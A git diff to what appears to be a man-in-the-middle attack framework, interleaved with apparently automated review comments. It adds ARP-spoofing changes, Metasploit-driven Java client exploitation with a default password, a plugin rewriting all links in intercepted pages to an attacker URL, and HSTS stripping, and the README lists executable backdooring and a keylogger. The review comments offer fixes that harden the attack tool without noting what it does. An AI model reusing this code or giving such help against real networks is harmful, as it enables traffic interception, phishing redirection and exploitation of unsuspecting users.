diff --git a/README.md b/README.md
index c969a43..37982ac 100644
--- a/README.md
+++ b/README.md
@@ -29,11 +29,13 @@ So far the most significant changes have been:
 - Addition of the JsKeylogger plugin
-- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
-https://github.com/secretsquirrel/the-backdoor-factory
+- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
+https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy
 - Added msfrpc.py for interfacing with Metasploits rpc server
+- Added Link Re-Writer plugin + - Addition of the app-cache poisoning attack by Krzysztof Kotowicz
 - JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!!
diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py
index 4059f04..1eb5dd7 100644
--- a/plugins/ArpSpoof.py
+++ b/plugins/ArpSpoof.py
@@ -18,6 +18,7 @@ class ArpSpoof(Plugin):
 self.options = options
 self.interface = options.interface
 self.routerip = options.routerip
+ self.routermac = getmacbyip(self.routerip)
 self.summary = options.summary
 self.target = options.target
 self.mode = options.mode
@@ -30,7 +31,7 @@ class ArpSpoof(Plugin):
 if os.geteuid() != 0:
 sys.exit("[-] %s plugin requires root privileges" % self.name)
- if self.interface == None or self.routerip == None:
+ if (not self.interface or not self.routerip):
 sys.exit("[-] %s plugin requires --routerip and --interface" % self.name)
 if self.options.log_level == 'debug':
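Review bot: `self.routermac = getmacbyip(self.routerip)` is evaluated before the `--routerip` guard that the next hunk (@@ -30) rewrites, so a missing option reaches getmacbyip with None instead of the intended `sys.exit("[-] %s plugin requires --routerip and --interface" % self.name)`; moving the assignment below that check keeps the error path clean. As far as I recall scapy's getmacbyip returns None when no ARP reply arrives, and the re-ARP frame in the @@ -107 hunk is then built from a None source, so `if self.routermac is None: sys.exit("[-] %s could not resolve the MAC of %s" % (self.name, self.routerip))` right after the lookup is worth adding. The enclosing initialize starts before and continues past both hunks.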
@@ -107,7 +108,5 @@ class ArpSpoof(Plugin):
 file.close()
 os.system('iptables -t nat -F && iptables -t nat -X')
 print '[*] Re-arping network'
- rearp_mac = getmacbyip(self.routerip)
- pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.mac, op=2)
- sendp(pkt, inter=1, count=5, iface=self.interface)
- sys.exit(0)
\ No newline at end of file
+ pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.routermac, op=2)
+ sendp(pkt, inter=1, count=5, iface=self.interface)
\ No newline at end of file
diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py
index 8cd61db..18d7a16 100644
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@@ -22,6 +22,8 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.options = options
 self.msfip = options.msfip
 self.msfport = options.msfport
+ self.rpcip = options.rpcip
+ self.rpcpass = options.rpcpass
 if not self.msfip:
 sys.exit('[-] JavaPwn plugin requires --msfip')
@@ -36,12 +38,12 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
 try:
- msf = msfrpc.Msfrpc({}) #create an instance of msfrpc libarary
- msf.login('msf', 'abc123')
+ msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
+ msf.login('msf', self.rpcpass)
 version = msf.call('core.version')['version']
 print "[*] Succesfully connected to Metasploit v%s" % version
 except:
- sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and ran 'load msgrpc Pass=abc123'")
+ sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
 #Initialize the BrowserProfiler plugin
 BrowserProfiler.initialize(self, options)
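Review bot: The bare `except:` around the rewritten connection block (@@ -36) still swallows every exception, including KeyboardInterrupt and SystemExit, and now that host and password are user-supplied a wrong `--rpcpass`, an unreachable `--rpcip` and a broken msfrpc import all collapse into one message with no hint which it was. Catch `Exception as e` and surface it: `except Exception as e:` / `sys.exit("[-] Error connecting to MSF (%s)! Make sure you started Metasploit and its MSGRPC server" % e)`. The dict spacing `{"host" : self.rpcip}` also differs from `{"host": self.rpcip}` used in finish() in the @@ -165 hunk. The enclosing initialize starts before this hunk.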
@@ -165,11 +167,13 @@ class JavaPwn(BrowserProfiler, Plugin):
 def add_options(self, options):
 options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
 options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
+ options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
+ options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
 def finish(self):
 '''This will be called when shutting down'''
- msf = msfrpc.Msfrpc({})
- msf.login('msf', 'abc123')
+ msf = msfrpc.Msfrpc({"host": self.rpcip})
+ msf.login('msf', self.rpcpass)
 jobs = msf.call('job.list')
 if len(jobs) > 0:
 print '[*] Stopping all running metasploit jobs'
diff --git a/plugins/Linkrewriter.py b/plugins/Linkrewriter.py
new file mode 100644
index 0000000..9582790
--- /dev/null
+++ b/plugins/Linkrewriter.py
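Review bot: `--rpcpass` ships a hard-coded default credential and repeats it in the help text, and as a command-line flag the real password ends up in shell history and in `ps` output visible to every user on the host; prefer no default, fall back to an environment variable or `getpass.getpass()` when the flag is absent, and drop the value from the help string. The `--rpcip` help says `[default: localhost]` while the default is `'127.0.0.1'`; make it `help='IP of MSF MSGRPC server [default: 127.0.0.1]'`. finish() also logs in with no error handling, unlike initialize, so a failed login at shutdown raises an uncaught exception and the job cleanup below never runs; its body continues outside the hunk.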
@@ -0,0 +1,48 @@
+#probably a better way of doing this
+
+import logging, re, sys, os
+from plugins.plugin import Plugin
+
+class LinkRw(Plugin):
+ name = "Link Re-Writer"
+ optname = "linkrw"
+ implements = ["handleResponse"]
+ has_opts = True
+ desc = "Rewrites all href attributes to a specified url"
+
+ def initialize(self, options):
+ '''Called if plugin is enabled, passed the options namespace'''
+ self.options = options
+ self.url = options.url
+
+ self.mime = "text/html"
+
+ print "[*] Link Re-Writer plugin online"
+
+
+ def handleResponse(self, request, data):
+ ip,hn,mime = self._get_req_info(request)
+ if mime.find(self.mime)!=-1:
+
+ data = self.repl_hrefs(data)
+ logging.info("%s [%s] Re-wrote hrefs" % (request.client.getClientIP(), request.headers['host']))
+ return {'request':request,'data':data}
+ else:
+ return
+
+ def add_options(self, options):
+ options.add_argument("--url", type=str, help="URL to re-write")
+
+ def _get_req_info(self, request):
+ ip = request.client.getClientIP()
+ hn = request.client.getRequestHostname()
+ mime = request.client.headers['Content-Type']
+ return (ip,hn,mime)
+
+ def repl_hrefs(self, data):
+
+ regex = [re.compile(r"href=[\'\"]http[s]?://.+[\'\"]", re.I)]
+
+ for i,r in enumerate(regex):
+ data=re.sub(r, "href=" + self.url, data)
+ return data
diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py
index 6896cc3..5dfad7f 100644
--- a/sslstrip/ClientRequest.py
+++ b/sslstrip/ClientRequest.py
@@ -56,6 +56,9 @@ class ClientRequest(Request):
 if 'accept-encoding' in headers:
 headers['accept-encoding'] == 'identity'
+ if 'Strict-Transport-Security' in headers: #kill new hsts requests
+ del headers['Strict-Transport-Security']
+
 if 'if-modified-since' in headers:
 del headers['if-modified-since']
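Review bot: `--url` has no default and initialize never checks it, so enabling the plugin without `--url` fails with a TypeError inside repl_hrefs on the first text/html response instead of the clear exit the ArpSpoof and JavaPwn plugins give for a missing option; add `if not self.url: sys.exit("[-] %s plugin requires --url" % self.name)` right after the assignment. `ip` and `hn` returned by _get_req_info and `i` from enumerate are never used, `mime.find(self.mime)!=-1` is just `self.mime in mime`, and `re.sub(r, ...)` on an already compiled pattern can be `r.sub(...)`. The module opens with `#probably a better way of doing this` where a docstring stating that the plugin only touches responses whose Content-Type contains text/html, and that handleResponse returns None for everything else, would help the next reader.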